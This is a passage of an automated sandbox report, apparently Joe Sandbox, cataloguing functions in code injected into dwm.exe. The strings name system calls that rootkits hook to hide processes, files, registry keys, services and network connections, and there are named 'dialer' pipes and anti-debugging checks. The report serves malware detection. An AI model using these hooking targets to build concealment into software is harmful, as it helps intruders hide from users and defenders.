StrCmpNIW.SHLWAPI ref: 000001D15B082C28
lstrlenW.KERNEL32 ref: 000001D15B082D50

Strings

ntdll.dll, xrefs: 000001D15B082BC9
NtQueryObject, xrefs: 000001D15B082BDB
\Device\Nsi, xrefs: 000001D15B082C1B

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: 40a47e266584ab49a054c122320084e23a4604b79c508007c12dfca1d73e9c7a
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: 6AB18B76210A50B2EB648FA5E6407E967B5FB86B84F045227FE0A53794DF38CE80CB40

Function 000001D15B087D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001D15B087DAC
RtlCaptureContext.NTDLL ref: 000001D15B087DD9
RtlLookupFunctionEntry.NTDLL ref: 000001D15B087DF3
RtlVirtualUnwind.NTDLL ref: 000001D15B087E34
IsDebuggerPresent.KERNEL32 ref: 000001D15B087E88
SetUnhandledExceptionFilter.KERNEL32 ref: 000001D15B087EA9
UnhandledExceptionFilter.KERNEL32 ref: 000001D15B087EB4

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: 9fd4c6f4a9868c89008620f2ba4854625be88f1b43fa80de57712a9e1c296b75
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: ED313072205B80A9EB609FA0F8907ED7375F785744F44452AEA4E57B98EF3CC648CB10

Function 000001D15B08D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001D15B08D31D
RtlLookupFunctionEntry.NTDLL ref: 000001D15B08D335
RtlVirtualUnwind.NTDLL ref: 000001D15B08D370
IsDebuggerPresent.KERNEL32 ref: 000001D15B08D3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 000001D15B08D3B3
UnhandledExceptionFilter.KERNEL32 ref: 000001D15B08D3BE

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: d475bc406b18891c6f55b59e54cc7d8a0552747163d67d503b6d1f93b9f01f25
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: 4A312D32214B80A5DB608B65E9413EE73B4F78A794F50422AEA9D53B99DF38C656CB00

Function 000001D15B0812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001D15B081319
GetProcessHeap.KERNEL32 ref: 000001D15B081327
HeapAlloc.KERNEL32 ref: 000001D15B081338
RegEnumValueW.ADVAPI32 ref: 000001D15B081397

Part of subcall function 000001D15B08152C: StrCmpIW.SHLWAPI ref: 000001D15B08155D

GetProcessHeap.KERNEL32 ref: 000001D15B0813DF
HeapAlloc.KERNEL32 ref: 000001D15B0813ED
GetProcessHeap.KERNEL32 ref: 000001D15B08140A
HeapFree.KERNEL32 ref: 000001D15B081418
lstrlenW.KERNEL32 ref: 000001D15B081421
GetProcessHeap.KERNEL32 ref: 000001D15B08142F
HeapAlloc.KERNEL32 ref: 000001D15B08143D
StrCpyW.SHLWAPI ref: 000001D15B08145F
GetProcessHeap.KERNEL32 ref: 000001D15B081476
HeapFree.KERNEL32 ref: 000001D15B081484

Strings

d, xrefs: 000001D15B08135A

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: fab350797a3e132e44a475c972967afaae47421dba3965977718ce1d959b3f36
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: 5B513C36204B84A6EB54CFA2F64839A77B1F7CABD9F144226DA4A07768DF3CC145CB00

Function 000001D15B081D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001D15B081D1F

Part of subcall function 000001D15B081FD4: GetModuleHandleA.KERNEL32 ref: 000001D15B081FEC
Part of subcall function 000001D15B081FD4: GetProcAddress.KERNEL32 ref: 000001D15B081FFD

Part of subcall function 000001D15B085B30: GetCurrentThreadId.KERNEL32 ref: 000001D15B085B6B

Strings

ntdll.dll, xrefs: 000001D15B081D2D
NtDeviceIoControlFile, xrefs: 000001D15B081E56
sechost.dll, xrefs: 000001D15B081E39
EnumServicesStatusExW, xrefs: 000001D15B081E11, 000001D15B081E32
NtQueryDirectoryFile, xrefs: 000001D15B081D7F
NtResumeThread, xrefs: 000001D15B081D62
NtQueryDirectoryFileEx, xrefs: 000001D15B081D9C
NtQuerySystemInformation, xrefs: 000001D15B081D45
EnumServiceGroupW, xrefs: 000001D15B081DF0
advapi32.dll, xrefs: 000001D15B081DF7, 000001D15B081E18
NtEnumerateKey, xrefs: 000001D15B081DB9
NtEnumerateValueKey, xrefs: 000001D15B081DD6

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: add11377254bc6963ce3acf859f52f56d2a54e07c526eebcf7fd9f76af8f1108
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: 7D31837414094AF0EA45EBE5FB627E46331BBC6384F905723A819135769F7C878ACF50

Function 000001D15B056910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001D15B056938
__scrt_acquire_startup_lock.LIBCMT ref: 000001D15B05698A
_RTC_Initialize.LIBCMT ref: 000001D15B0569B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001D15B0569DE
__scrt_release_startup_lock.LIBCMT ref: 000001D15B056A09

Strings

`eh vector copy constructor iterator', xrefs: 000001D15B056A3B
`eh vector vbase copy constructor iterator', xrefs: 000001D15B0569EE
scriptor', xrefs: 000001D15B056B39, 000001D15B056BB2, 000001D15B056BEC
`dynamic initializer for ', xrefs: 000001D15B0569C7

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 9899f0a63020608f8bd148cb1c60f5f97051fd4fc7a9ccd648660387e03fe635
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: EC818D31700245B6FA54ABE5B6413E966B0BBC7780F5487279A4587FD6EF3CC8858F00

Function 000001D15B08CE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 000001D15B08CE37
FlsGetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CE4C
FlsSetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CE6D
FlsSetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CE9A
FlsSetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CEAB
FlsSetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CEBC
SetLastError.KERNEL32 ref: 000001D15B08CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CF0D
FlsSetValue.KERNEL32(?,?,00000001,000001D15B08ECCC,?,?,?,?,000001D15B08BF9F,?,?,?,?,?,000001D15B087AB0), ref: 000001D15B08CF2C

Part of subcall function 000001D15B08D6CC: HeapAlloc.KERNEL32 ref: 000001D15B08D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CF54

Part of subcall function 000001D15B08D744: HeapFree.KERNEL32 ref: 000001D15B08D75A
Part of subcall function 000001D15B08D744: GetLastError.KERNEL32 ref: 000001D15B08D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CF76

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: 9b750e709900db3f8b285b53116fd6575ddcb28fdcc9ce29755ace1c2dd3b0f1
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: A141903020164475FA78A7F177523E922727FD77B0F244B26B936166E7EE6CC6218E00

Function 000001D15B082244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001D15B082259
GetCurrentProcessId.KERNEL32 ref: 000001D15B082263

Part of subcall function 000001D15B081934: OpenProcess.KERNEL32 ref: 000001D15B081952
Part of subcall function 000001D15B081934: IsWow64Process.KERNEL32 ref: 000001D15B081968
Part of subcall function 000001D15B081934: CloseHandle.KERNEL32 ref: 000001D15B081983

CreateFileW.KERNEL32 ref: 000001D15B0822BC
WriteFile.KERNEL32 ref: 000001D15B0822E4
ReadFile.KERNEL32 ref: 000001D15B082303
CloseHandle.KERNEL32 ref: 000001D15B08230C

Strings

\\.\pipe\dialerchildproc64, xrefs: 000001D15B08228C
\\.\pipe\dialerchildproc32, xrefs: 000001D15B082293

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 41706d217f2a720ae4aab521bad0f7ff9b88dcc047f0c6081fb2eadaeabb3915
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: 5B210936614A40A2FB108B65F6543AA77B1F7CABE4F544316EA5903AA8DF7CC159CF00

Function 000001D15B059944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001D15B0599A1

Part of subcall function 000001D15B05A814: __GetUnwindTryBlock.LIBCMT ref: 000001D15B05A857
Part of subcall function 000001D15B05A814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001D15B05A87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001D15B059A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001D15B059CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001D15B059DDA

Strings

csm, xrefs: 000001D15B059A22
csm, xrefs: 000001D15B0599BB
csm, xrefs: 000001D15B059A9C

Memory Dump Source

Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: c9a44203c85b194ee5cd671319f3b60fad20d985c7369b2bd6b8861db9d1c30d
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 4DE17D72604740AAEF609FA5E6803ED7BB0F786798F101616EE8957F99CB38C491CF10

Function 000001D15B08A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001D15B08A5A1

Part of subcall function 000001D15B08B414: __GetUnwindTryBlock.LIBCMT ref: 000001D15B08B457
Part of subcall function 000001D15B08B414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001D15B08B47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001D15B08A679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001D15B08A8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001D15B08A9DA

Strings

csm, xrefs: 000001D15B08A5BB
csm, xrefs: 000001D15B08A622
csm, xrefs: 000001D15B08A69C

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: ea01caaa994d164788636285076b0a23ccf458b0f8d08db0ec26a99fbfa44400
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: 14E17D73604B50BAEB209FA5E6803DD77B0F786798F101216EE8957B99CB3CD291CB40

Function 000001D15B08F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 000001D15B08F510
GetProcAddress.KERNEL32 ref: 000001D15B08F51C

Strings

api-ms-, xrefs: 000001D15B08F45A
ext-ms-, xrefs: 000001D15B08F46D

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: 8e71964b12e5497720adbb1a18e5f38c870111146b2f8171ee932e9e5d9738ee
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: 9241C232311A0071EA16CBA6BA447D622B1B7C6BA0F595B27AD0D87795EF3CC5458B00

Function 000001D15B08104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001D15B0810B1
RegEnumValueW.ADVAPI32 ref: 000001D15B081117
GetProcessHeap.KERNEL32 ref: 000001D15B08115A
HeapAlloc.KERNEL32 ref: 000001D15B081168
GetProcessHeap.KERNEL32 ref: 000001D15B081185
HeapFree.KERNEL32 ref: 000001D15B081193

Strings

d, xrefs: 000001D15B0810D6

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: 2f97bd44212738b4f0fd68c0a3c83db76a186731d17fbb047330c0b4ac045da4
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: 3C416033214B84E6EB61CF61E54439A77B1F789B98F548216EA8A07768DF3CC545CB40

Function 000001D15B08D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D087
FlsSetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D0A6
FlsSetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D0CE
FlsSetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D0DF
FlsSetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D0F0

Strings

1%, xrefs: 000001D15B08D0CE
Y%, xrefs: 000001D15B08D0A6

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: 13fbe4c6b139939fe37899a14166972d1612d0360ef9c3f5d72efffbfed6cb3c
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: 7511AF3020064471FA6867B577533E921627FC73F0F24472BB939566EADEACC6138E00

Function 000001D15B087510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001D15B087538
__scrt_acquire_startup_lock.LIBCMT ref: 000001D15B08758A
_RTC_Initialize.LIBCMT ref: 000001D15B0875B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001D15B0875DE
__scrt_release_startup_lock.LIBCMT ref: 000001D15B087609

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 3812768a4e1d2533d5da41b8756ff201dffa7907902ac4002edcc2a878ca687c
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: B581A231600641BAFB54ABE5B6413F926B1BBC7B80F548717BA046779EEB7CCA458F00

Function 000001D15B089DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001D15B089E49
GetLastError.KERNEL32 ref: 000001D15B089E57
LoadLibraryExW.KERNEL32 ref: 000001D15B089E81
FreeLibrary.KERNEL32 ref: 000001D15B089EC7
GetProcAddress.KERNEL32 ref: 000001D15B089ED3

Strings

api-ms-, xrefs: 000001D15B089E69

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 6e15ed0949bfb5216cb814d62189d048777d240dce15dffa5e9fec4e72e22969
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 0131A531312A40F1EF21EB82B6407E566B4B7CABA0F591727AD5E07791EF3DC6458B00

Function 000001D15B093DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001D15B093DE5
GetLastError.KERNEL32 ref: 000001D15B093DF1
CloseHandle.KERNEL32 ref: 000001D15B093E09
CreateFileW.KERNEL32 ref: 000001D15B093E34
WriteConsoleW.KERNEL32 ref: 000001D15B093E53

Strings

CONOUT$, xrefs: 000001D15B093E15

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: 13c8e84db8bee54869fc96a58eb2befedfb66cda121ff3aeff9f931b6924d8d0
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 0E118F31310B40A6E7508B92FA8439976B0F7CAFE4F584326EA5A877A4CF7CC8148B44

Function 000001D15B082F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001D15B082F27
HeapAlloc.KERNEL32 ref: 000001D15B082F3A
StrCmpNIW.SHLWAPI ref: 000001D15B082FAF
GetProcessHeap.KERNEL32 ref: 000001D15B083015
HeapFree.KERNEL32 ref: 000001D15B083023

Strings

dialer, xrefs: 000001D15B082FA8

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: 3d5b71034d731c953d380acef17a0a8a858cb0eb617b39730b5743b24673e542
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: 19315E72701B51B2E614DF96F6507A967B0BB86B84F084232AE4847B66EF38C5A1CB00

Function 000001D15B0814A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001D15B0814C5
HeapFree.KERNEL32 ref: 000001D15B0814D4
GetProcessHeap.KERNEL32 ref: 000001D15B0814E1
HeapFree.KERNEL32 ref: 000001D15B0814F0
GetProcessHeap.KERNEL32 ref: 000001D15B081500

Strings

C:\Windows\system32\dwm.exe, xrefs: 000001D15B0961A9, 000001D15B0961B1

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Heap$Process$Free
String ID: C:\Windows\system32\dwm.exe
API String ID: 3168794593-3609004125
Opcode ID: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
Instruction ID: d252221322fe01a850e07044becba49017ad83fb22d48e7d030e1ea0cfae6874
Opcode Fuzzy Hash: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
Instruction Fuzzy Hash: E2218B7B909A90BAE350DBA5BA553D937B0F78AB84F0D4127DB4983267DB2DC4048B00

Function 000001D15B08CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001D15B08CFAF
FlsSetValue.KERNEL32(?,?,?,000001D15B08D6B5,?,?,?,?,000001D15B08D778), ref: 000001D15B08CFE5
FlsSetValue.KERNEL32(?,?,?,000001D15B08D6B5,?,?,?,?,000001D15B08D778), ref: 000001D15B08D012
FlsSetValue.KERNEL32(?,?,?,000001D15B08D6B5,?,?,?,?,000001D15B08D778), ref: 000001D15B08D023
FlsSetValue.KERNEL32(?,?,?,000001D15B08D6B5,?,?,?,?,000001D15B08D778), ref: 000001D15B08D034
SetLastError.KERNEL32 ref: 000001D15B08D04F

Memory Dump Source

Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 6ecae6925db91b410eb5347c0bf5a1ffd44c0f9873f60c95fa77b5d3b1e31e79
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
